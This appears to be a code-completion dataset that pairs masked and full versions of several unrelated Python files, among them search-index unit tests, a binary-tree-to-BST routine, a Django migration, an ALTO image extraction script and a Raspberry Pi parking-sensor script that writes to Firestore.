search_index.search('', 37.787, -122.398658184604, \n 37.7901490737255, -122.394)\n assert_equals([x['objectid'] for x in results], all_objectids)\n\n def test_case_search4(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[2:4]]\n results = search_index.search('cold', 37.7860914634251, -\n 122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results], all_objectids)\n\n def test_case_search5(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[1:2]]\n results = search_index.search('cheese', 37.7860914634251, -\n 122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results], all_objectids)\n",
"step-3": "<mask token>\n\n\nclass TestClass:\n\n def setUp(self):\n search_index.buildIndex(test_data.sample_food_trucks_data)\n\n def tearDown(self):\n pass\n\n def test_case_query_index(self):\n assert_equals(search_index.query_index, test_data.sample_query_index)\n\n def test_case_lat_index(self):\n assert_equals(search_index.sorted_latitudes, test_data.\n sample_latitude_index)\n\n def test_case_lng_index(self):\n assert_equals(search_index.sorted_longitudes, test_data.\n sample_longitude_index)\n\n def test_case_search_query(self):\n assert_equals(search_index.searchQuery('cold'), set([2, 3]))\n\n def test_case_search_query_case(self):\n assert_equals(search_index.searchQuery('Cold'), set([2, 3]))\n\n def test_case_search_find_le(self):\n assert_equals(search_index.find_le([10, 20, 30, 40], 20), 1)\n assert_equals(search_index.find_le([10, 20, 30, 40], 20.1), 1)\n assert_equals(search_index.find_le([10, 20, 30, 40], 30), 2)\n\n def test_case_search_find_ge(self):\n assert_equals(search_index.find_ge([10, 20, 30, 40], 20), 1)\n assert_equals(search_index.find_ge([10, 20, 30, 40], 30), 2)\n assert_equals(search_index.find_ge([10, 20, 30, 40], 20.1), 2)\n <mask token>\n\n def test_case_search1(self):\n all_objectids = [x['objectid'] for x in search_index.all_results]\n results = search_index.search('', 37.7860914634251, -\n 122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results], all_objectids)\n <mask token>\n\n def test_case_search3(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[0:3]]\n results = search_index.search('', 37.787, -122.398658184604, \n 37.7901490737255, -122.394)\n assert_equals([x['objectid'] for x in results], all_objectids)\n\n def test_case_search4(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[2:4]]\n results = search_index.search('cold', 37.7860914634251, -\n 122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results], all_objectids)\n\n def test_case_search5(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[1:2]]\n results = search_index.search('cheese', 37.7860914634251, -\n 122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results], all_objectids)\n",
"step-4": "<mask token>\n__author__ = 'abhay'\nfrom nose.tools import *\nimport test_data\nimport search_index\n\n\nclass TestClass:\n\n def setUp(self):\n search_index.buildIndex(test_data.sample_food_trucks_data)\n\n def tearDown(self):\n pass\n\n def test_case_query_index(self):\n assert_equals(search_index.query_index, test_data.sample_query_index)\n\n def test_case_lat_index(self):\n assert_equals(search_index.sorted_latitudes, test_data.\n sample_latitude_index)\n\n def test_case_lng_index(self):\n assert_equals(search_index.sorted_longitudes, test_data.\n sample_longitude_index)\n\n def test_case_search_query(self):\n assert_equals(search_index.searchQuery('cold'), set([2, 3]))\n\n def test_case_search_query_case(self):\n assert_equals(search_index.searchQuery('Cold'), set([2, 3]))\n\n def test_case_search_find_le(self):\n assert_equals(search_index.find_le([10, 20, 30, 40], 20), 1)\n assert_equals(search_index.find_le([10, 20, 30, 40], 20.1), 1)\n assert_equals(search_index.find_le([10, 20, 30, 40], 30), 2)\n\n def test_case_search_find_ge(self):\n assert_equals(search_index.find_ge([10, 20, 30, 40], 20), 1)\n assert_equals(search_index.find_ge([10, 20, 30, 40], 30), 2)\n assert_equals(search_index.find_ge([10, 20, 30, 40], 20.1), 2)\n\n def test_case_search_lat(self):\n assert_equals(search_index.find_array_range_matching([10, 20, 30, \n 40], 20, 30), set([1, 2]))\n assert_equals(search_index.find_array_range_matching([10, 20, 30, \n 40], 19, 35), set([1, 2]))\n assert_equals(search_index.find_array_range_matching([10, 20, 30, \n 40], 9, 50), set([0, 1, 2, 3]))\n\n def test_case_search1(self):\n all_objectids = [x['objectid'] for x in search_index.all_results]\n results = search_index.search('', 37.7860914634251, -\n 122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results], all_objectids)\n\n def test_case_search2(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[0:3]]\n results = search_index.search('', 37.7879000978181, -\n 122.398658184604, 37.7901490737255, -122.394594036205)\n assert_equals([x['objectid'] for x in results], all_objectids)\n\n def test_case_search3(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[0:3]]\n results = search_index.search('', 37.787, -122.398658184604, \n 37.7901490737255, -122.394)\n assert_equals([x['objectid'] for x in results], all_objectids)\n\n def test_case_search4(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[2:4]]\n results = search_index.search('cold', 37.7860914634251, -\n 122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results], all_objectids)\n\n def test_case_search5(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[1:2]]\n results = search_index.search('cheese', 37.7860914634251, -\n 122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results], all_objectids)\n",
"step-5": "# Copyright (C) 2014 Abhay Vardhan. All Rights Reserved.\n\"\"\"\nAuthor: abhay.vardhan@gmail.com\n\nWe have not yet added tests which exercise the HTTP GET directly.\n\"\"\"\n__author__ = 'abhay'\n\nfrom nose.tools import *\n\nimport test_data\nimport search_index\n\nclass TestClass:\n def setUp(self):\n search_index.buildIndex(test_data.sample_food_trucks_data)\n\n def tearDown(self):\n pass\n\n def test_case_query_index(self):\n assert_equals(search_index.query_index, test_data.sample_query_index)\n\n def test_case_lat_index(self):\n assert_equals(search_index.sorted_latitudes, test_data.sample_latitude_index)\n\n def test_case_lng_index(self):\n assert_equals(search_index.sorted_longitudes, test_data.sample_longitude_index)\n\n def test_case_search_query(self):\n assert_equals(search_index.searchQuery('cold'), set([2, 3]))\n\n def test_case_search_query_case(self):\n assert_equals(search_index.searchQuery('Cold'), set([2, 3]))\n\n def test_case_search_find_le(self):\n assert_equals(search_index.find_le([10, 20, 30, 40], 20), 1)\n assert_equals(search_index.find_le([10, 20, 30, 40], 20.1), 1)\n assert_equals(search_index.find_le([10, 20, 30, 40], 30), 2)\n\n def test_case_search_find_ge(self):\n assert_equals(search_index.find_ge([10, 20, 30, 40], 20), 1)\n assert_equals(search_index.find_ge([10, 20, 30, 40], 30), 2)\n assert_equals(search_index.find_ge([10, 20, 30, 40], 20.1), 2)\n\n def test_case_search_lat(self):\n assert_equals(search_index.find_array_range_matching([10, 20, 30, 40], 20, 30), set([1, 2]))\n assert_equals(search_index.find_array_range_matching([10, 20, 30, 40], 19, 35), set([1, 2]))\n assert_equals(search_index.find_array_range_matching([10, 20, 30, 40], 9, 50), set([0, 1, 2, 3]))\n\n def test_case_search1(self):\n all_objectids = [x['objectid'] for x in search_index.all_results]\n results = search_index.search('', 37.7860914634251, -122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results],\n all_objectids)\n\n def test_case_search2(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[0:3]]\n results = search_index.search('', 37.7879000978181, -122.398658184604, 37.7901490737255, -122.394594036205)\n assert_equals([x['objectid'] for x in results],\n all_objectids)\n\n def test_case_search3(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[0:3]]\n results = search_index.search('', 37.787, -122.398658184604, 37.7901490737255, -122.394)\n assert_equals([x['objectid'] for x in results],\n all_objectids)\n\n def test_case_search4(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[2:4]]\n results = search_index.search('cold', 37.7860914634251, -122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results],\n all_objectids)\n\n def test_case_search5(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[1:2]]\n results = search_index.search('cheese', 37.7860914634251, -122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results],\n all_objectids)\n\n\n",
"step-ids": [
11,
13,
14,
18,
19
]
}
|
[
11,
13,
14,
18,
19
] |
from DataStructures.BST.util import *
def storeInorder(root, inorder):
if root is None:
return
storeInorder(root.left, inorder)
inorder.append(root.data)
storeInorder(root.right, inorder)
def arrayToBST(arr, root):
# Base Case
if root is None:
return
# First update the left subtree
arrayToBST(arr, root.left)
# now update root's data delete the value from array
root.data = arr[0]
arr.pop(0)
# Finally update the right subtree
arrayToBST(arr, root.right)
def binaryTreeToBST(root):
if root is None:
return
# Create the temp array and store the inorder traveral of tree
arr = []
storeInorder(root, arr)
# Sort the array
arr.sort()
# copy array elements back to binary tree
arrayToBST(arr, root)
if __name__ == '__main__':
root = Node(10)
root.left = Node(30)
root.right = Node(15)
root.left.left = Node(20)
root.right.right = Node(5)
binaryTreeToBST(root)
inorder(root)
|
normal
|
{
"blob_id": "d2af2b25a1ba2db93c977a13fe0273919bc2e6e0",
"index": 7768,
"step-1": "<mask token>\n\n\ndef storeInorder(root, inorder):\n if root is None:\n return\n storeInorder(root.left, inorder)\n inorder.append(root.data)\n storeInorder(root.right, inorder)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef storeInorder(root, inorder):\n if root is None:\n return\n storeInorder(root.left, inorder)\n inorder.append(root.data)\n storeInorder(root.right, inorder)\n\n\ndef arrayToBST(arr, root):\n if root is None:\n return\n arrayToBST(arr, root.left)\n root.data = arr[0]\n arr.pop(0)\n arrayToBST(arr, root.right)\n\n\ndef binaryTreeToBST(root):\n if root is None:\n return\n arr = []\n storeInorder(root, arr)\n arr.sort()\n arrayToBST(arr, root)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef storeInorder(root, inorder):\n if root is None:\n return\n storeInorder(root.left, inorder)\n inorder.append(root.data)\n storeInorder(root.right, inorder)\n\n\ndef arrayToBST(arr, root):\n if root is None:\n return\n arrayToBST(arr, root.left)\n root.data = arr[0]\n arr.pop(0)\n arrayToBST(arr, root.right)\n\n\ndef binaryTreeToBST(root):\n if root is None:\n return\n arr = []\n storeInorder(root, arr)\n arr.sort()\n arrayToBST(arr, root)\n\n\nif __name__ == '__main__':\n root = Node(10)\n root.left = Node(30)\n root.right = Node(15)\n root.left.left = Node(20)\n root.right.right = Node(5)\n binaryTreeToBST(root)\n inorder(root)\n",
"step-4": "from DataStructures.BST.util import *\n\n\ndef storeInorder(root, inorder):\n if root is None:\n return\n storeInorder(root.left, inorder)\n inorder.append(root.data)\n storeInorder(root.right, inorder)\n\n\ndef arrayToBST(arr, root):\n if root is None:\n return\n arrayToBST(arr, root.left)\n root.data = arr[0]\n arr.pop(0)\n arrayToBST(arr, root.right)\n\n\ndef binaryTreeToBST(root):\n if root is None:\n return\n arr = []\n storeInorder(root, arr)\n arr.sort()\n arrayToBST(arr, root)\n\n\nif __name__ == '__main__':\n root = Node(10)\n root.left = Node(30)\n root.right = Node(15)\n root.left.left = Node(20)\n root.right.right = Node(5)\n binaryTreeToBST(root)\n inorder(root)\n",
"step-5": "from DataStructures.BST.util import *\n\n\ndef storeInorder(root, inorder):\n if root is None:\n return\n\n storeInorder(root.left, inorder)\n inorder.append(root.data)\n storeInorder(root.right, inorder)\n\n\ndef arrayToBST(arr, root):\n # Base Case\n if root is None:\n return\n\n # First update the left subtree\n arrayToBST(arr, root.left)\n\n # now update root's data delete the value from array\n root.data = arr[0]\n arr.pop(0)\n\n # Finally update the right subtree\n arrayToBST(arr, root.right)\n\n\ndef binaryTreeToBST(root):\n if root is None:\n return\n\n # Create the temp array and store the inorder traveral of tree\n arr = []\n storeInorder(root, arr)\n # Sort the array\n arr.sort()\n # copy array elements back to binary tree\n arrayToBST(arr, root)\n\n\nif __name__ == '__main__':\n root = Node(10)\n root.left = Node(30)\n root.right = Node(15)\n root.left.left = Node(20)\n root.right.right = Node(5)\n\n binaryTreeToBST(root)\n\n inorder(root)\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [migrations.swappable_dependency(settings.
AUTH_USER_MODEL), ('organization', '0010_auto_20210801_1623'), (
'quote', '0004_auto_20210805_1032')]
operations = [migrations.CreateModel(name='FollowUp', fields=[('id',
models.BigAutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('timestamp', models.DateTimeField(
auto_now_add=True, verbose_name='تاریخ ثبت')), ('text', models.
TextField(default=None, verbose_name='متن پیگیری')), ('creator',
models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=
settings.AUTH_USER_MODEL, verbose_name='کاربر ثبت کننده')), (
'organization', models.ForeignKey(on_delete=django.db.models.
deletion.CASCADE, to='organization.organization', verbose_name=
'سازمان'))])]
<|reserved_special_token_1|>
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [migrations.swappable_dependency(settings.
AUTH_USER_MODEL), ('organization', '0010_auto_20210801_1623'), (
'quote', '0004_auto_20210805_1032')]
operations = [migrations.CreateModel(name='FollowUp', fields=[('id',
models.BigAutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('timestamp', models.DateTimeField(
auto_now_add=True, verbose_name='تاریخ ثبت')), ('text', models.
TextField(default=None, verbose_name='متن پیگیری')), ('creator',
models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=
settings.AUTH_USER_MODEL, verbose_name='کاربر ثبت کننده')), (
'organization', models.ForeignKey(on_delete=django.db.models.
deletion.CASCADE, to='organization.organization', verbose_name=
'سازمان'))])]
<|reserved_special_token_1|>
# Generated by Django 3.2.5 on 2021-08-05 07:19
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('organization', '0010_auto_20210801_1623'),
('quote', '0004_auto_20210805_1032'),
]
operations = [
migrations.CreateModel(
name='FollowUp',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('timestamp', models.DateTimeField(auto_now_add=True, verbose_name='تاریخ ثبت')),
('text', models.TextField(default=None, verbose_name='متن پیگیری')),
('creator', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='کاربر ثبت کننده')),
('organization', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='organization.organization', verbose_name='سازمان')),
],
),
]
|
flexible
|
{
"blob_id": "f2c53efa4b7c2df592582e3093ff269b703be1e0",
"index": 3054,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('organization', '0010_auto_20210801_1623'), (\n 'quote', '0004_auto_20210805_1032')]\n operations = [migrations.CreateModel(name='FollowUp', fields=[('id',\n models.BigAutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('timestamp', models.DateTimeField(\n auto_now_add=True, verbose_name='تاریخ ثبت')), ('text', models.\n TextField(default=None, verbose_name='متن پیگیری')), ('creator',\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n settings.AUTH_USER_MODEL, verbose_name='کاربر ثبت کننده')), (\n 'organization', models.ForeignKey(on_delete=django.db.models.\n deletion.CASCADE, to='organization.organization', verbose_name=\n 'سازمان'))])]\n",
"step-4": "from django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('organization', '0010_auto_20210801_1623'), (\n 'quote', '0004_auto_20210805_1032')]\n operations = [migrations.CreateModel(name='FollowUp', fields=[('id',\n models.BigAutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('timestamp', models.DateTimeField(\n auto_now_add=True, verbose_name='تاریخ ثبت')), ('text', models.\n TextField(default=None, verbose_name='متن پیگیری')), ('creator',\n models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\n settings.AUTH_USER_MODEL, verbose_name='کاربر ثبت کننده')), (\n 'organization', models.ForeignKey(on_delete=django.db.models.\n deletion.CASCADE, to='organization.organization', verbose_name=\n 'سازمان'))])]\n",
"step-5": "# Generated by Django 3.2.5 on 2021-08-05 07:19\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('organization', '0010_auto_20210801_1623'),\n ('quote', '0004_auto_20210805_1032'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='FollowUp',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('timestamp', models.DateTimeField(auto_now_add=True, verbose_name='تاریخ ثبت')),\n ('text', models.TextField(default=None, verbose_name='متن پیگیری')),\n ('creator', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='کاربر ثبت کننده')),\n ('organization', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='organization.organization', verbose_name='سازمان')),\n ],\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# 文字列(結合)
str1 = "py"
str2 = "thon"
print(str1+str2)
|
normal
|
{
"blob_id": "d95cbca8e892f18f099b370e139176770ce0c1b7",
"index": 8270,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(str1 + str2)\n",
"step-3": "str1 = 'py'\nstr2 = 'thon'\nprint(str1 + str2)\n",
"step-4": "# 文字列(結合)\n\nstr1 = \"py\"\nstr2 = \"thon\"\nprint(str1+str2)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for xml_path in glob.glob('./input/**/*.xml', recursive=True):
current, image = read_alto_for_training(xml_path)
images[image] = current
for key in current:
data[key].extend(current[key])
<|reserved_special_token_0|>
for cls in data:
total = sum([len(val) for val in data.values()])
print(
f"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})"
)
minimum = min([len(data[cls]), minimum])
extract_images_from_bbox_dict_for_training(images, output_dir='./data/')
split_dataset('./data/*', max_size=minimum, except_for_train=True)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
data = defaultdict(list)
images = {}
for xml_path in glob.glob('./input/**/*.xml', recursive=True):
current, image = read_alto_for_training(xml_path)
images[image] = current
for key in current:
data[key].extend(current[key])
minimum = float('inf')
for cls in data:
total = sum([len(val) for val in data.values()])
print(
f"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})"
)
minimum = min([len(data[cls]), minimum])
extract_images_from_bbox_dict_for_training(images, output_dir='./data/')
split_dataset('./data/*', max_size=minimum, except_for_train=True)
<|reserved_special_token_1|>
import glob
from collections import defaultdict
from stylalto.datasets.extractor import read_alto_for_training, extract_images_from_bbox_dict_for_training, split_dataset
data = defaultdict(list)
images = {}
for xml_path in glob.glob('./input/**/*.xml', recursive=True):
current, image = read_alto_for_training(xml_path)
images[image] = current
for key in current:
data[key].extend(current[key])
minimum = float('inf')
for cls in data:
total = sum([len(val) for val in data.values()])
print(
f"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})"
)
minimum = min([len(data[cls]), minimum])
extract_images_from_bbox_dict_for_training(images, output_dir='./data/')
split_dataset('./data/*', max_size=minimum, except_for_train=True)
<|reserved_special_token_1|>
import glob
from collections import defaultdict
from stylalto.datasets.extractor import read_alto_for_training, extract_images_from_bbox_dict_for_training, split_dataset
data = defaultdict(list)
images = {}
for xml_path in glob.glob("./input/**/*.xml", recursive=True):
current, image = read_alto_for_training(xml_path)
images[image] = current
for key in current:
data[key].extend(current[key])
minimum = float("inf")
for cls in data:
total = sum([len(val) for val in data.values()])
print(f"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})")
minimum = min([len(data[cls]), minimum])
# Extract images
extract_images_from_bbox_dict_for_training(images, output_dir="./data/")
# Split into dataset
split_dataset("./data/*", max_size=minimum, except_for_train=True)
|
flexible
|
{
"blob_id": "41e642c4acb212470577ef43908a1dcf2e0f5730",
"index": 7159,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor xml_path in glob.glob('./input/**/*.xml', recursive=True):\n current, image = read_alto_for_training(xml_path)\n images[image] = current\n for key in current:\n data[key].extend(current[key])\n<mask token>\nfor cls in data:\n total = sum([len(val) for val in data.values()])\n print(\n f\"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})\"\n )\n minimum = min([len(data[cls]), minimum])\nextract_images_from_bbox_dict_for_training(images, output_dir='./data/')\nsplit_dataset('./data/*', max_size=minimum, except_for_train=True)\n",
"step-3": "<mask token>\ndata = defaultdict(list)\nimages = {}\nfor xml_path in glob.glob('./input/**/*.xml', recursive=True):\n current, image = read_alto_for_training(xml_path)\n images[image] = current\n for key in current:\n data[key].extend(current[key])\nminimum = float('inf')\nfor cls in data:\n total = sum([len(val) for val in data.values()])\n print(\n f\"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})\"\n )\n minimum = min([len(data[cls]), minimum])\nextract_images_from_bbox_dict_for_training(images, output_dir='./data/')\nsplit_dataset('./data/*', max_size=minimum, except_for_train=True)\n",
"step-4": "import glob\nfrom collections import defaultdict\nfrom stylalto.datasets.extractor import read_alto_for_training, extract_images_from_bbox_dict_for_training, split_dataset\ndata = defaultdict(list)\nimages = {}\nfor xml_path in glob.glob('./input/**/*.xml', recursive=True):\n current, image = read_alto_for_training(xml_path)\n images[image] = current\n for key in current:\n data[key].extend(current[key])\nminimum = float('inf')\nfor cls in data:\n total = sum([len(val) for val in data.values()])\n print(\n f\"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})\"\n )\n minimum = min([len(data[cls]), minimum])\nextract_images_from_bbox_dict_for_training(images, output_dir='./data/')\nsplit_dataset('./data/*', max_size=minimum, except_for_train=True)\n",
"step-5": "import glob\nfrom collections import defaultdict\nfrom stylalto.datasets.extractor import read_alto_for_training, extract_images_from_bbox_dict_for_training, split_dataset\n\n\ndata = defaultdict(list)\nimages = {}\nfor xml_path in glob.glob(\"./input/**/*.xml\", recursive=True):\n current, image = read_alto_for_training(xml_path)\n images[image] = current\n for key in current:\n data[key].extend(current[key])\n\nminimum = float(\"inf\")\nfor cls in data:\n total = sum([len(val) for val in data.values()])\n print(f\"{cls.zfill(10).replace('0', ' ')} : {len(data[cls]) / total:.2f} of the whole ({len(data[cls])})\")\n minimum = min([len(data[cls]), minimum])\n\n# Extract images\nextract_images_from_bbox_dict_for_training(images, output_dir=\"./data/\")\n\n# Split into dataset\nsplit_dataset(\"./data/*\", max_size=minimum, except_for_train=True)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(s1, GPIO.IN)
GPIO.setup(s2, GPIO.IN)
<|reserved_special_token_0|>
while 1:
if GPIO.input(s1) == False:
data1 = 1
counter += 1
else:
data1 = 0
print('Received from 1: %s' % data1)
if GPIO.input(s2) == False:
data2 = 1
counter -= 1
else:
data2 = 0
print('Received from 2: %s' % data2)
if counter > 8:
counter = 8
elif counter < 0:
counter = 0
print('Counter= %s' % counter)
doc_ref_s1.update({u'priority': counter})
<|reserved_special_token_1|>
<|reserved_special_token_0|>
path = '/home/pi/Desktop/Parking.json'
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = path
s1 = 2
s2 = 21
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(s1, GPIO.IN)
GPIO.setup(s2, GPIO.IN)
db = firestore.Client()
doc_ref_s1 = db.collection(u'sensors').document(u'sensor1')
doc_ref_s2 = db.collection(u'sensors').document(u'sensor2')
data1 = 0
data2 = 0
counter = 0
while 1:
if GPIO.input(s1) == False:
data1 = 1
counter += 1
else:
data1 = 0
print('Received from 1: %s' % data1)
if GPIO.input(s2) == False:
data2 = 1
counter -= 1
else:
data2 = 0
print('Received from 2: %s' % data2)
if counter > 8:
counter = 8
elif counter < 0:
counter = 0
print('Counter= %s' % counter)
doc_ref_s1.update({u'priority': counter})
<|reserved_special_token_1|>
import os
import RPi.GPIO as GPIO
from google.cloud import firestore
import time
path = '/home/pi/Desktop/Parking.json'
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = path
s1 = 2
s2 = 21
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(s1, GPIO.IN)
GPIO.setup(s2, GPIO.IN)
db = firestore.Client()
doc_ref_s1 = db.collection(u'sensors').document(u'sensor1')
doc_ref_s2 = db.collection(u'sensors').document(u'sensor2')
data1 = 0
data2 = 0
counter = 0
while 1:
if GPIO.input(s1) == False:
data1 = 1
counter += 1
else:
data1 = 0
print('Received from 1: %s' % data1)
if GPIO.input(s2) == False:
data2 = 1
counter -= 1
else:
data2 = 0
print('Received from 2: %s' % data2)
if counter > 8:
counter = 8
elif counter < 0:
counter = 0
print('Counter= %s' % counter)
doc_ref_s1.update({u'priority': counter})
<|reserved_special_token_1|>
import os
import RPi.GPIO as GPIO
from google.cloud import firestore
import time
############Explicit Credential environment
path="/home/pi/Desktop/Parking.json"
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] =path
#GPIO starts
s1=2
s2=21
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(s1,GPIO.IN)
GPIO.setup(s2,GPIO.IN)
#firestore initialization
db = firestore.Client()
doc_ref_s1 = db.collection(u'sensors').document(u'sensor1')
doc_ref_s2 = db.collection(u'sensors').document(u'sensor2')
#here starts main
data1=0
data2=0
counter=0
while 1:
if(GPIO.input(s1)==False): #car found in slot 1
data1=1
counter+=1
else: data1=0
print("Received from 1: %s" % data1)
###Now starts for sensor 2
if(GPIO.input(s2)==False): #car found in slot 2
data2=1
counter-=1
else: data2=0
print("Received from 2: %s" % data2)
if(counter>8):
counter=8
elif(counter<0):
counter=0
print("Counter= %s" % counter)
doc_ref_s1.update({
u'priority': counter
})
|
flexible
|
{
"blob_id": "e1cc4e17bffcbbae3e7785e4c55acde167a8a50a",
"index": 6482,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(s1, GPIO.IN)\nGPIO.setup(s2, GPIO.IN)\n<mask token>\nwhile 1:\n if GPIO.input(s1) == False:\n data1 = 1\n counter += 1\n else:\n data1 = 0\n print('Received from 1: %s' % data1)\n if GPIO.input(s2) == False:\n data2 = 1\n counter -= 1\n else:\n data2 = 0\n print('Received from 2: %s' % data2)\n if counter > 8:\n counter = 8\n elif counter < 0:\n counter = 0\n print('Counter= %s' % counter)\n doc_ref_s1.update({u'priority': counter})\n",
"step-3": "<mask token>\npath = '/home/pi/Desktop/Parking.json'\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = path\ns1 = 2\ns2 = 21\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(s1, GPIO.IN)\nGPIO.setup(s2, GPIO.IN)\ndb = firestore.Client()\ndoc_ref_s1 = db.collection(u'sensors').document(u'sensor1')\ndoc_ref_s2 = db.collection(u'sensors').document(u'sensor2')\ndata1 = 0\ndata2 = 0\ncounter = 0\nwhile 1:\n if GPIO.input(s1) == False:\n data1 = 1\n counter += 1\n else:\n data1 = 0\n print('Received from 1: %s' % data1)\n if GPIO.input(s2) == False:\n data2 = 1\n counter -= 1\n else:\n data2 = 0\n print('Received from 2: %s' % data2)\n if counter > 8:\n counter = 8\n elif counter < 0:\n counter = 0\n print('Counter= %s' % counter)\n doc_ref_s1.update({u'priority': counter})\n",
